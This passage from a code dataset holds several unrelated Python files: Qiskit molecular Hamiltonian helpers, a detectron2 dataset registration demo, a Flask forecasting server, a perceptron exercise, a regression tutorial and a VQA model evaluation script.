initial Hartree Fock state\n\tmapper_type: str (optional)\n\t\tType of mapping between orbitals and qubits. Available options:\n\t\t\t'ParityMapper'\n\t\t\t'JordanWignerMapper'\n\t\t\t'BravyiKitaevMapper'\n\n\tReturns\n\t-------\n\tqubit_op: SummedOp\n\t\tPauli strings and coefficients for the Hamiltonian\n\tinit_state: QuantumCircuit (if initial_state=True)\n\t\tQuantum Circuit with the initial state given by Hartree Fock\n\t\"\"\"\n\n\tmolecule = 'H .0 .0 .0; H .0 .0 ' + str(distance)\n\n\ttry:\n\t\tdriver = PySCFDriver(molecule)\n\texcept:\n\t\tfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\n\t\tdriver = PyQuanteDriver(molecule)\n\n\tqmolecule = driver.run()\n\n\tif remove_orbitals is False:\n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core) \n\telse: \n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core, remove_orbitals=remove_orbitals)\n\n\tproblem = ElectronicStructureProblem(driver, transformers=[Transfomer])\n\n\t# Generate the second-quantized operators\n\tsecond_q_ops = problem.second_q_ops()\n\n\t# Hamiltonian\n\tmain_op = second_q_ops[0]\n\n\t# Setup the mapper and qubit converter\n\tif mapper_type == 'ParityMapper':\n\t\tmapper = ParityMapper()\n\telif mapper_type == 'JordanWignerMapper':\n\t\tmapper = JordanWignerMapper()\n\telif mapper_type == 'BravyiKitaevMapper':\n\t\tmapper = BravyiKitaevMapper()\n\n\t# The fermionic operators are mapped\n\tconverter = QubitConverter(mapper=mapper, two_qubit_reduction=True)\n\n\tif operator is False :\n\t\treturn converter, problem\n\telse :\n\t\tparticle_number = problem.grouped_property_transformed.get_property(\"ParticleNumber\")\n\t\tnum_particles = ( particle_number.num_alpha, particle_number.num_beta )\n\t\tnum_spin_orbitals = particle_number.num_spin_orbitals\n\t\tqubit_op = converter.convert(main_op, num_particles=num_particles) \n\t\tif initial_state is False:\n\t\t\treturn qubit_op \n\t\telse:\n\t\t\tinit_state = HartreeFock(num_spin_orbitals, num_particles, converter)\n\t\t\treturn qubit_op, init_state\n\n\n\ndef LiH(distance=1.5474, freeze_core=True, remove_orbitals=[3,4], initial_state=False, operator=True, mapper_type='ParityMapper'):\n\t\"\"\"\n\tQiskit operator of the LiH\n\n\tParameters\n\t----------\n\tdistance: float (optional)\n\t\tDistance between atoms of Li and H\n\tfreeze_core: Bool (optional)\n\t\tIf freeze some cores that do highly impact in the energy\n\tremove_orbitals: Bool (optional)\n\t\tRemove some orbitals that do no impact in the energy\n\tinitial_state: Bool (optional)\n\t\tReturn the initial Hartree Fock state\n\tmapper_type: str (optional)\n\t\tType of mapping between orbitals and qubits. Available options:\n\t\t\t'ParityMapper'\n\t\t\t'JordanWignerMapper'\n\t\t\t'BravyiKitaevMapper'\n\n\tReturns\n\t-------\n\tqubit_op: SummedOp\n\t\tPauli strings and coefficients for the Hamiltonian\n\tinit_state: QuantumCircuit (if initial_state=True)\n\t\tQuantum Circuit with the initial state given by Hartree Fock\n\t\"\"\"\n\n\tmolecule = 'Li 0.0 0.0 0.0; H 0.0 0.0 ' + str(distance)\n\n\ttry:\n\t\tdriver = PySCFDriver(molecule)\n\texcept:\n\t\tfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\n\t\tdriver = PyQuanteDriver(molecule)\n\n\tqmolecule = driver.run()\n\n\tif remove_orbitals is False:\n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core) \n\telse: \n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core, remove_orbitals=remove_orbitals)\n\n\tproblem = ElectronicStructureProblem(driver, transformers=[Transfomer])\n\n\t# Generate the second-quantized operators\n\tsecond_q_ops = problem.second_q_ops()\n\n\t# Hamiltonian\n\tmain_op = second_q_ops[0]\n\n\t# Setup the mapper and qubit converter\n\tif mapper_type == 'ParityMapper':\n\t\tmapper = ParityMapper()\n\telif mapper_type == 'JordanWignerMapper':\n\t\tmapper = JordanWignerMapper()\n\telif mapper_type == 'BravyiKitaevMapper':\n\t\tmapper = BravyiKitaevMapper()\n\n\t# The fermionic operators are mapped\n\tconverter = QubitConverter(mapper=mapper, two_qubit_reduction=True)\n\n\t# The fermionic operators are mapped to qubit operators\n\tnum_particles = (problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_alpha,\n problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_beta)\n# \tnum_spin_orbitals = 2 * problem.molecule_data_transformed.num_molecular_orbitals\n\n\tif operator is False :\n\t\treturn converter, problem\n\telse :\n\t\tparticle_number = problem.grouped_property_transformed.get_property(\"ParticleNumber\")\n\t\tnum_particles = ( particle_number.num_alpha, particle_number.num_beta )\n\t\tnum_spin_orbitals = particle_number.num_spin_orbitals\n\t\tqubit_op = converter.convert(main_op, num_particles=num_particles) \n\t\tif initial_state is False:\n\t\t\treturn qubit_op \n\t\telse:\n\t\t\tinit_state = HartreeFock(num_spin_orbitals, num_particles, converter)\n\t\t\treturn qubit_op, init_state\n\n\n\ndef BeH2(distance=1.339, freeze_core=True, remove_orbitals=[3,6], operator=True, initial_state=False, mapper_type='ParityMapper'): #\n\t\"\"\"\n\tQiskit operator of the BeH2\n\n\tParameters\n\t----------\n\tdistance: float (optional)\n\t\tDistance between atoms of Be and H\n\tfreeze_core: Bool (optional)\n\t\tIf freeze some cores that do highly impact in the energy\n\tremove_orbitals: Bool (optional)\n\t\tRemove some orbitals that do no impact in the energy\n\tinitial_state: Bool (optional)\n\t\tReturn the initial Hartree Fock state\n\tmapper_type: str (optional)\n\t\tType of mapping between orbitals and qubits. Available options:\n\t\t\t'ParityMapper'\n\t\t\t'JordanWignerMapper'\n\t\t\t'BravyiKitaevMapper'\n\n\tReturns\n\t-------\n\tqubit_op: SummedOp\n\t\tPauli strings and coefficients for the Hamiltonian\n\tinit_state: QuantumCircuit (if initial_state=True)\n\t\tQuantum Circuit with the initial state given by Hartree Fock\n\t\"\"\"\n\n\tmolecule = 'H 0.0 0.0 -' + str(distance) + '; Be 0.0 0.0 0.0; H 0.0 0.0 ' + str(distance)\n\n\ttry:\n\t\tdriver = PySCFDriver(molecule)\n\texcept:\n\t\tfrom qiskit_nature.drivers.second_quantization.pyquanted import PyQuanteDriver\n\t\tdriver = PyQuanteDriver(molecule)\n\n\tqmolecule = driver.run()\n\tif remove_orbitals is False:\n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core) \n\telse: \n\t\tTransfomer = FreezeCoreTransformer(freeze_core=freeze_core, remove_orbitals=remove_orbitals)\n\n\tproblem = ElectronicStructureProblem(driver,transformers=[Transfomer])\n\n\t# Generate the second-quantized operators\n\tsecond_q_ops = problem.second_q_ops()\n\n\t# Hamiltonian\n\tmain_op = second_q_ops[0]\n\n\t# Setup the mapper and qubit converter\n\tif mapper_type == 'ParityMapper':\n\t\tmapper = ParityMapper()\n\telif mapper_type == 'JordanWignerMapper':\n\t\tmapper = JordanWignerMapper()\n\telif mapper_type == 'BravyiKitaevMapper':\n\t\tmapper = BravyiKitaevMapper()\n \n\tnum_particles = (problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_alpha,\n problem.grouped_property_transformed.get_property(\"ParticleNumber\").num_beta)\n\t# The fermionic operators are mapped\n\tconverter = QubitConverter(mapper=mapper, two_qubit_reduction=True, z2symmetry_reduction=\"auto\")\n \n\tif operator is False :\n\t\treturn converter, problem\n\telse :\n\t\tparticle_number = problem.grouped_property_transformed.get_property(\"ParticleNumber\")\n\t\tnum_particles = ( particle_number.num_alpha, particle_number.num_beta )\n\t\tnum_spin_orbitals = particle_number.num_spin_orbitals\n\t\tqubit_op = converter.convert(main_op, num_particles=num_particles) \n\t\tif initial_state is False:\n\t\t\treturn qubit_op \n\t\telse:\n\t\t\tinit_state = HartreeFock(num_spin_orbitals, num_particles, converter)\n\t\t\treturn qubit_op, init_state\n\n\ndef unpack_functions(pack):\n\t\"\"\"\n\tUnpack the list where the first element is the index of the async execution, the second index in the function to\n\trun, the third index are the function variables, and the last index (if provided) are the optional arguments.\n\n\tParameter\n\t---------\n\tpack: list\n\t\tList with all the data\n\n\t Return\n\t ------\n\t Result of the function\n\t\"\"\"\n\tif len(pack) < 4: # If no optional arguments are provided\n\t\tpack.append({})\n\treturn [pack[0], pack[1](*pack[2], **pack[3])]\n\n\ndef sort_solution(data):\n\t\"\"\"\n\tFunction to sort the data obtained for a parallel computation\n\n\tParameter\n\t---------\n\tdata: list\n\t\tList in which each entry represents one solution of the parallel computation. The elements are\n\t\talso list which contains in the first element the index and in the second one the result of the computation.\n\n\tReturn\n\t------\n\tList with the data sorted\n\t\"\"\"\n\tn = len(data) # Extract the number of computations done\n\tsorted_sol = [None] * n # Empty list with the correct number of elements\n\tfor i in range(n): # Iterate over all the elements\n\t\tindex = data[i][0] # Obtain the index of the result\n\t\ttemp = data[i][1] # Obtain the result\n\t\tsorted_sol[index] = temp # Save the result in the correct element\n\n\treturn sorted_sol\n\n\ndef isnotebook():\n\t\"\"\"\n\tCheck if the script is been running in a jupyter notebook instance\n\n\tReturn\n\t------\n\tTrue is the instance is a Jupyter notebook, false in other cases\n\t\"\"\"\n\ttry:\n\t\tshell = get_ipython().__class__.__name__\n\t\tif shell == 'ZMQInteractiveShell':\n\t\t\treturn True # Jupyter notebook or qtconsole\n\t\telif shell == 'TerminalInteractiveShell':\n\t\t\treturn False # Terminal running IPython\n\t\telse:\n\t\t\treturn False # Other type (?)\n\texcept NameError:\n\t\treturn False # Probably standard Python interpreter\n\n\ndef permutate_indices(diagonal_factors, qubit0, qubit1, n_qubits):\n\t\"\"\"\n\tPermute the diagonal factors indices by the interchange of qubit_0 <---> qubit_1, maintaining all other indices the\n\tsame.\n\n\tParameters\n\t----------\n\tdiagonal_factors: ndarray (2 ** n_qubits)\n\t\tDiagonal factors for the computation of the expected energy\n\tqubit0: int\n\t\tIndex of the first qubit to swap\n\tqubit1: int\n\t\tIndex of the second qubit to swap\n\tn_qubits: int\n\t\tNumber of qubits in the circuit\n\n\tReturn\n\t------\n\ttemp: ndarray (2 ** n_qubits)\n\t\tRefactor diagonal factors\n\t\"\"\"\n\ttemp = np.zeros(2 ** n_qubits)\n\n\t# Iterate over all the possible outputs of the circuit\n\tfor i in range(len(temp)):\n\t\tnew = bin(i)[2:] # New index in binary\n\t\tif len(new) < n_qubits: # Complete with 0's if the index is not of the correct size\n\t\t\tnew = ''.join(['0']) * (n_qubits - len(new)) + new\n\t\told = swapPositions(new, qubit0, qubit1) # Swap the indices of qubit_0 and qubit_1\n\t\ttemp[int(new, 2)] = diagonal_factors[int(old, 2)] # Copy the old diagonal factor in the new position\n\n\treturn temp\n\n\ndef swapPositions(str_variable, pos1, pos2):\n\t\"\"\"\n\tSwap the position of two indices of a given string.\n\n\tParameters\n\t----------\n\tstr_variable: str\n\t\tString to interchange the indices. The length must be >= max(pos1, pos2)\n\tpos1: int\n\t\tIndex of the first element to swap\n\tpos2: int\n\t\tIndex of the second element to swap\n\n\tReturn\n\t------\n\tReformat string with the given swaps\n\t\"\"\"\n\tlist_variable = list(str_variable)\n\tlist_variable[pos1], list_variable[pos2] = list_variable[pos2], list_variable[pos1]\n\treturn ''.join(list_variable)\n\n\ndef swaps(arr, reverse=True):\n\t\"\"\"\n\tCompute the needed swaps of two elements to sort a given array in descending (or ascending) order.\n\n\tParameters\n\t----------\n\tarr: list\n\t\tOriginal array with unsorted numbers [0, 1, ...., len(arr) - 1]. A given element can not appear twice.\n\treverse: bool (optional, default=True)\n\t\tIf reverse=True, sort in descending order, if reverse=False, sort in ascending order\n\n\tReturns\n\t-------\n\tswaps: ndarray (n, 2)\n\t\tArray containing the indices needed to perform a total of n swaps. Each swap corresponds to a given row. The\n\t\tswaps must be performed in the correct order, starting from swaps[0], and finish in swaps[-1].\n\t\"\"\"\n\t# If descending order, reverse the order of the original array\n\tif reverse:\n\t\tarr = arr[::-1]\n\tn = len(arr) # Number of elements\n\tswaps = [] # List with the swaps\n\n\t# Start the algorithm\n\ti = 0\n\twhile i < n:\n\t\tif arr[i] != i: # If the element is not in the correct locations\n\t\t\tswaps.append(np.array([i, arr[i]]))\n\t\t\t# Interchange the element with the correct element in a given location\n\t\t\tarr[arr[i]], arr[i] = arr[i], arr[arr[i]]\n\t\telse:\n\t\t\ti += 1\n\n\tswaps = np.array(swaps)\n\n\t# If descending order, transform the indices in each swap. E.g. if N = 3: 0 --> |0 - 3 + 1| = 2, 1 -> 1 and 2 -> 0\n\tif reverse:\n\t\tswaps = np.abs(swaps - n + 1)\n\n\treturn swaps\n","sub_path":"Codes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222811938","text":"import matplotlib.pyplot as plt\r\nplt.rcParams['font.sans-serif']=['SimHei'] # 用来正常显示中文标签\r\nimport matplotlib.font_manager as fm # 字体管理器\r\n\r\n\r\ndef run_data():\r\n data = {\r\n \"Query AvRE\": [6.85e-04,8.22e-03,8.15e-02,8.54],\r\n \"Freq Patten AvRE\": [0.13,1.08,1.24,1.31],\r\n \"Trip Error\": [2.27e-03,4.17e-02,3.67e-01,6.80e-01],\r\n \"Diameter Error\": [1.04e-05,4.98e-04,0.27,0.41]\r\n }\r\n return data\r\n\r\n\r\ndef get_plot(metrics, data):\r\n x_data = [0.1, 0.5, 1, 2]\r\n rage = [str([0.0001, 0.00099]), str([0.001, 0.0099]), str([0.01, 0.099]), str([0.1, 0.99])]\r\n paper_data = {\r\n \"Query AvRE\": [0.295, 0.203, 0.171, 0.159],\r\n \"Freq Patten AvRE\": [0.340, 0.329, 0.322, 0.329],\r\n \"Trip Error\": [0.071, 0.054, 0.034, 0.017],\r\n \"Diameter Error\": [0.103, 0.089, 0.078, 0.076]\r\n }\r\n # 防止乱码\r\n plt.rcParams[\"font.sans-serif\"] = [\"SimHei\"]\r\n plt.rcParams[\"axes.unicode_minus\"] = False\r\n plt.plot(rage, data, color=\"red\", marker=\"*\", label=\"offset\")\r\n # plt.plot(x_data, data, color=\"red\", marker=\"*\", label=\"geolife\")\r\n # plt.plot(x_data, paper_data[metrics], color=\"blue\", marker=\"o\", label=\"paper\")\r\n plt.ylabel(\"指标结果\")\r\n plt.title(metrics)\r\n plt.legend()\r\n plt.savefig('../data/Geolife Trajectories 1.3/' + metrics + \".jpg\")\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n for index, key in run_data().items():\r\n get_plot(index, key)\r\n","sub_path":"utils/get_plot.py","file_name":"get_plot.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"488216060","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserv\nimport detectron2\nfrom detectron2.utils.logger import setup_logger\nsetup_logger()\n\nimport os\n# import some common libraries\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom google.colab.patches import cv2_imshow\nfrom detectron2.data.datasets import load_coco_json\n\n# import some common detectron2 utilities\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\n\nWINDOW_NAME = \"detections\"\n\n# inference\nINPUT_IMG_PATH = '/home/sxm/cocodataset/ftb/images/train'\nOUTPUT_IMG_PATH = '/home/sxm/cocodataset/ftb/out'\n\n# 数据集路径\nDATASET_ROOT = '/home/sxm/cocodataset/ftb'\nANN_ROOT = os.path.join(DATASET_ROOT, 'annotations')\nTRAIN_PATH = os.path.join(DATASET_ROOT, 'images', 'train')\nVAL_PATH = os.path.join(DATASET_ROOT, 'images', 'val')\nTRAIN_JSON = os.path.join(ANN_ROOT, 'train', 'trainval.json')\nVAL_JSON = os.path.join(ANN_ROOT, 'val', 'trainval.json')\n\n# 数据集类别元数据\nDATASET_CATEGORIES = [\n {\"name\": \"ball\", \"id\": 1, \"isthing\": 1, \"color\": [220, 20, 60]},\n {\"name\": \"man\", \"id\": 2, \"isthing\": 1, \"color\": [219, 142, 185]},\n]\n\n# 数据集的子集\nPREDEFINED_SPLITS_DATASET = {\n \"football\": (TRAIN_PATH, TRAIN_JSON),\n \"footballval\": (VAL_PATH, VAL_JSON),\n}\n\n\ndef register_dataset():\n \"\"\"\n purpose: register all splits of dataset with PREDEFINED_SPLITS_DATASET\n \"\"\"\n for key, (image_root, json_file) in PREDEFINED_SPLITS_DATASET.items():\n register_dataset_instances(name=key,\n metadate=get_dataset_instances_meta(),\n json_file=json_file,\n image_root=image_root)\n\n\ndef get_dataset_instances_meta():\n \"\"\"\n purpose: get metadata of dataset from DATASET_CATEGORIES\n return: dict[metadata]\n \"\"\"\n thing_ids = [k[\"id\"] for k in DATASET_CATEGORIES if k[\"isthing\"] == 1]\n thing_colors = [k[\"color\"] for k in DATASET_CATEGORIES if k[\"isthing\"] == 1]\n # assert len(thing_ids) == 2, len(thing_ids)\n thing_dataset_id_to_contiguous_id = {k: i for i, k in enumerate(thing_ids)}\n thing_classes = [k[\"name\"] for k in DATASET_CATEGORIES if k[\"isthing\"] == 1]\n thing_dataset_id_to_contiguous_id = {0: 0, 1: 1}\n ret = {\n \"thing_dataset_id_to_contiguous_id\": thing_dataset_id_to_contiguous_id,\n \"thing_classes\": thing_classes,\n \"thing_colors\": thing_colors,\n }\n return ret\n\n\ndef register_dataset_instances(name, metadate, json_file, image_root):\n \"\"\"\n purpose: register dataset to DatasetCatalog,\n register metadata to MetadataCatalog and set attribute\n \"\"\"\n DatasetCatalog.register(name, lambda: load_coco_json(json_file, image_root, name))\n MetadataCatalog.get(name).set(json_file=json_file,\n image_root=image_root,\n evaluator_type=\"coco\",\n **metadate)\n\n\n# 注册数据集和元数据\ndef plain_register_dataset():\n DatasetCatalog.register(\"football\", lambda: load_coco_json(TRAIN_JSON, TRAIN_PATH, \"football\"))\n MetadataCatalog.get(\"football\").set(thing_classes=[\"ball\", \"man\"],\n json_file=TRAIN_JSON,\n image_root=TRAIN_PATH)\n DatasetCatalog.register(\"footballval\", lambda: load_coco_json(VAL_JSON, VAL_PATH, \"footballval\"))\n MetadataCatalog.get(\"footballval\").set(thing_classes=[\"ball\", \"man\"],\n json_file=VAL_JSON,\n image_root=VAL_PATH)\n\nfrom detectron2.data.datasets import register_coco_instances\n#register_coco_instances(\"fruits_nuts\", {}, \"/home/sxm/cocodataset/data/trainval.json\", \"/home/sxm/cocodataset/data/images\")\n\nregister_dataset()\n\nfruits_nuts_metadata = MetadataCatalog.get(\"football\")\ndataset_dicts = DatasetCatalog.get(\"football\")\n\nimport random\n\nfor d in random.sample(dataset_dicts, 3):\n img = cv2.imread(d[\"file_name\"])\n visualizer = Visualizer(img[:, :, ::-1], metadata=fruits_nuts_metadata, scale=0.5)\n vis = visualizer.draw_dataset_dict(d)\n #cv2_imshow(vis.get_image()[:, :, ::-1])\n plt.figure()\n plt.imshow(vis.get_image()[:, :, ::-1])\n plt.show()","sub_path":"demo/coco_ftb.py","file_name":"coco_ftb.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"422033594","text":"#!/usr/bin/python3\n\nimport argparse\nimport atexit\nimport signal\nfrom flask import Flask\nfrom utils.logger import setup_logger, get_logger\nfrom exception.engine_computation_exception import EngineComputationException\nimport time_series_analysis_controller\nimport exception_handler\n\napp = Flask(__name__)\napp.add_url_rule(\"/time-series-analysis/forecast\", methods=['POST'],\n view_func=time_series_analysis_controller.forecast)\napp.add_url_rule(\"/time-series-analysis/forecast-accuracy\", methods=['POST'],\n view_func=time_series_analysis_controller.compute_accuracy_of_forecast)\napp.add_url_rule(\"/time-series-analysis/predict\", methods=['POST'],\n view_func=time_series_analysis_controller.predict)\napp.register_error_handler(EngineComputationException, exception_handler.handle_engine_computation_exception)\n\n\ndef on_shutdown():\n get_logger().info(\"Engine will shutdown\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--port\", dest=\"port\", help=\"port to run python engine\", required=True)\n parser.add_argument(\"--logs-path\", dest=\"logs_path\", help=\"location to dump logs\", required=True)\n args = parser.parse_args()\n\n logger = setup_logger(args.logs_path, args.port)\n atexit.register(on_shutdown)\n signal.signal(signal.SIGTERM, on_shutdown)\n signal.signal(signal.SIGINT, on_shutdown)\n logger.info(\"Engine is up\")\n app.run(host='0.0.0.0', port=args.port)\n","sub_path":"engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"464072632","text":"\"\"\"\nFecha: 26 -ago-2019\n\n\"\"\"\n\n#%% importar librerias\nimport numpy as np\n\n#%% Funciones:\ndef signo(net):\n fsigno = [1. if elem >=0 else -1. for elem in net]\n return fsigno\n\ndef signo_escalar(net_escalar):\n y_pred = 1 if net_escalar >=0 else -1\n return y_pred\n\ndef iniciar_pesos(num_features):\n W = np.random.rand(num_features + 1)\n bias_val = np.random.random()\n W[2] = bias_val\n return W\n\ndef net(x_input, W):\n Net = np.dot(x_input, np.transpose(W))\n return Net\n\ndef funcion_error(y_verdadero, y_predicho):\n cont = 0\n for indice, y_i in enumerate(y_predicho):\n if y_i != y_verdadero[indice]:\n cont = cont+1\n return cont\n\n#%% programa\n# Definiendo el dataset de entrada\nX = np.array([[-1, -1],\n [-1, 1],\n [1,-1],\n [1, 1]], dtype=np.float)\n\n# Definiendo las salidas\nY = np.array([[-1],[1],[1],[1]], dtype=np.float)\n\nsamples, features = np.shape(X) # samples = muestra/ ejemplo. features = característica\nx_bias = -np.ones((samples,1))\nX_comp = np.concatenate((X, x_bias), axis=1)\n\n#---- Inicializacion de pesos\n# W = np.random.rand(features+1)\n# bias_val = np.random.random()\n# W[2] = bias_val\n\nW = iniciar_pesos(num_features=features)\n\n#---- Calcular Net\n# Net = np.dot(X_comp, np.transpose(W))\nNet = net(x_input=X_comp, W=W)\n#----\n\n#---- signo\n# signo_res = []\n# for elem in Net:\n# if elem >=0:\n# signo_res.append(1.)\n# else:\n# signo_res.append(-1.)\n\nY_pred = signo(Net)\n\nerror_v = funcion_error(y_verdadero=Y, y_predicho=Y_pred)\n\n# Algoritmo de Aprendizaje del Perceptron\n\nprint('error inicial {}'.format(error_v))\n\nlearning_rate = 0.01\nepoca = 0\nNum_Max_Epocas = 150\nterminar = False\n\nwhile(epoca Garbage in and Garbage out (i.e., if we provide too much of useless data we'll not gonna get useful output).\n# --> If our model depends on very large number of factors when not needed, accounting for them or explaining others\n# about those factors is a waste of time of both, ours and others as well as explaining such a large factors\n# itself is very difficult. \n#\n# - Methods of Building models:\n# --> All-in (generally useless and a wrong practice)\n# --> Backward Elimination\n# --> Forward Selection\n# --> Bidirectional Elimination\n# --> Score Comparison\n#\n# Generally Step-By-Step Regression covers the methods 2 to 4.\n# Many People also refer just the Bi-Directional Elimination as a Step-By-Step Regression.\n#\n# - `All-in` cases:\n# - Prior Knowledge (that these specific variables are going to be used)\n# - You have to include these varaibles and have no choice\n# - Preparing for Backward Elimination\n#\n# - `Backward Elimination` steps:\n# Step1 - Select a significance level to stay in the model (eg: Sl = 0.05, i.e., 5 percent)\n# Step2 - Fit the model with all possible predictors (All-in)\n# Step3 - Consider the predictor with the highest P-value. If P > Sl, go to step 4, otherwise go to FIN\n# Step4 - Remove the predictor\n# Step5 - Fit model without this predictor (or varaible) then Repeat Step3\n# FIN - Your Model is Ready.\n#\n# - `Forward Selection` steps:\n# Step1 - Select a significance level to enter the model (eg: Sl = 0.05)\n# Step2 - Fit all simple regression models y ~ x(n). Select the one with thre lowest P-value\n# Step3 - Keep this variable and fit all possible models with one extra predictor added to the one(s) you already \n# have\n# Step4 - Consider the predictor with lowest P-value. If P < Sl, go to step3, otherwise go to FIN.\n# FIN - Keep the previous model (i.e., the model before the addition of the last insignificant variable) as the\n# final model.\n#\n# - `Bi-Directional Elimination` steps:\n# Step1 - Select a significance level to enter and to stay in the model (eg: Sl_enter = 0.05, Sl_stay = 0.05)\n# Step2 - Perform the next step of Forward Selection (new variables must have: P < Sl_enter to enter)\n# Step3 - Perform All Steps of Backward Elimination (old variables must have p < Sl_stay to stay), then Repeat Step2\n# Step4 - No new Variables can enter and no old variables can exit\n# FIN - Your Model is Ready.\n#\n# - `Score Comparision (or All Possible Models)` steps:\n# Step1 - Select a criterion of goodness of fit.\n# Step2 - Construct All Possible Regression Models: 2**n - 1 total combinations\n# Step3 - Select the one with the best criterion\n# FIN - Your Model is Ready.\n# This Approach is too much resource consuming and hence not good for every time use.\n\n# ***** Model-Optimization: Backward Elimination *****\n# sklearn.linear_model library accounts for the constant b0, but statsmodels doesn't. So we need to add it manually.\n#\nimport statsmodels.formula.api as sm\nfeatures = np.append(arr=np.ones((50, 1)).astype(int), values=features, axis=1) # axis=1 for column and axis=0 for row.\n#\n# Using a threshold value of 0.05 for P-values.\n#\n# opt_features = features[:, [0, 1, 2, 3, 4, 5]] # Step1 - All-in\n# ols_regressor = sm.OLS(endog=output, exog=opt_features).fit() # Step2 - Fit the model\n# ols_regressor.summary() # Step3 - Consider the predictor with the highest P-value\n#\n# opt_features = features[:, [0, 1, 3, 4, 5]] # Step4 - Remove the predictor\n# ols_regressor = sm.OLS(endog=output, exog=opt_features).fit() # Step2\n# ols_regressor.summary() # Step3\n#\n# opt_features = features[:, [0, 3, 4, 5]] # Step4\n# ols_regressor = sm.OLS(endog=output, exog=opt_features).fit() # Step2\n# ols_regressor.summary() # Step3\n#\n#\n# Way-1: Using threshold values ----------------------------------------------\nopt_features = features[:, [0, 3, 5]] # Step4\nols_regressor = sm.OLS(endog=target, exog=opt_features).fit() # Step2\nols_regressor.summary() # Step3\nopt_features = features[:, [3]] # Step4\n# Removing not only feature-5 but also the feature-0 as it is the constant value we have added.\n\n# ***** Checking the Results with opt_features *****\nopt_training_features = training_features[:, [2]]\nopt_testing_features = testing_features[:, [2]]\nopt_regressor = LinearRegression()\nopt_regressor.fit(opt_training_features, training_target)\nopt_predicted_target = opt_regressor.predict(opt_testing_features)\nopt_error = abs(testing_target - opt_predicted_target)\n\n# ***** Visualising Results (Optimised) *****\n# - Visualising the Training set results\nplt.subplot(121)\nplt.scatter(opt_training_features, training_target, color='red')\nplt.plot(opt_training_features, opt_regressor.predict(opt_training_features), color='blue')\nplt.title('Profit vs R&D-Spend (Training-Set)')\nplt.xlabel('R&D Spend')\nplt.ylabel('Profit')\n# - Visualising the Test set results\nplt.subplot(122)\nplt.scatter(opt_testing_features, testing_target, color='red')\nplt.plot(opt_testing_features, opt_predicted_target, color='blue')\nplt.title('Profit vs R&D-Spend (Testing-Set)')\nplt.xlabel('R&D Spend')\nplt.ylabel('Profit')\nplt.show()\n\n\n# Way-2: Using Adjusted-R**2 values ------------------------------------------\nopt_features = features[:, [0, 3, 5]] # Step4\nols_regressor = sm.OLS(endog=target, exog=opt_features).fit() # Step2\nols_regressor.summary() # Step3\nopt_features = features[:, [0, 3]] # Step4\nols_regressor = sm.OLS(endog=target, exog=opt_features).fit() # Step2\nols_regressor.summary() # Step3\n# Since, the Adjusted-R value drops with the drop of variable no.-5, indicates us that the variable no.-5 is also an\n# effective variable (or regressor).\n\n# ***** Checking the Results with opt_features *****\nopt_training_features = training_features[:, [2, 4]]\nopt_testing_features = testing_features[:, [2, 4]]\nopt_regressor = LinearRegression()\nopt_regressor.fit(opt_training_features, training_target)\nopt_predicted_target = opt_regressor.predict(opt_testing_features)\nopt_error2 = abs(testing_target - opt_predicted_target)\n","sub_path":"02_Supervised/01_Regression/02_Mulitple_Linear_Regression/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":10142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"395772255","text":"import torch\r\nimport torch.utils.data as data\r\nfrom data_utils import get_vocab, VqaDataset, get_datasets\r\nfrom models import VqaModel\r\nimport os\r\nfrom parameters import DEVICE, BATCH_SIZE, N_WORKERS, PREPROCESSED_FILE_PATH\r\nfrom preprocess_images import preprocess_images\r\n\r\n\r\ndef evaluate_hw3():\r\n print('starting. device:', DEVICE)\r\n if not os.path.exists(PREPROCESSED_FILE_PATH):\r\n print('No preprocessed images found. Preprocessing. It will take ~hour')\r\n preprocess_images()\r\n vocabs = get_vocab()\r\n train_data, val_data = get_datasets(vocabs)\r\n val_loader = data.DataLoader(dataset=val_data, batch_size=BATCH_SIZE, shuffle=False, num_workers=N_WORKERS)\r\n input_text_size = train_data.question_vocab_size\r\n output_text_size = train_data.answer_vocab_size\r\n print('Loading model')\r\n model = VqaModel(input_text_size, output_text_size)\r\n model.load_state_dict(torch.load('model.pkl', map_location=lambda storage, loc: storage))\r\n model.to(DEVICE)\r\n model.eval()\r\n total_error = 0\r\n answers = {}\r\n print('Starting evaluation')\r\n\r\n batch_idx = 0\r\n for batch_sample in val_loader:\r\n images = batch_sample['image'].to(DEVICE)\r\n questions = batch_sample['question'].to(DEVICE)\r\n labels = batch_sample['answer'].to(DEVICE)\r\n\r\n items = batch_sample['item_no']\r\n with torch.set_grad_enabled(False):\r\n outputs = model(images, questions)\r\n _, predicted = torch.max(outputs.data, 1)\r\n\r\n num_answered = (predicted == labels).sum().item()\r\n error = 1 - num_answered / BATCH_SIZE\r\n total_error += error\r\n for i, item in enumerate(items):\r\n answers[item.item()] = predicted[i].item()\r\n batch_idx += 1\r\n del items\r\n del images\r\n average_error = total_error/(len(answers)/128)\r\n print('0-1 accuracy of multi-choice winner on validation set is:', 1-average_error)\r\n\r\n total_acc = 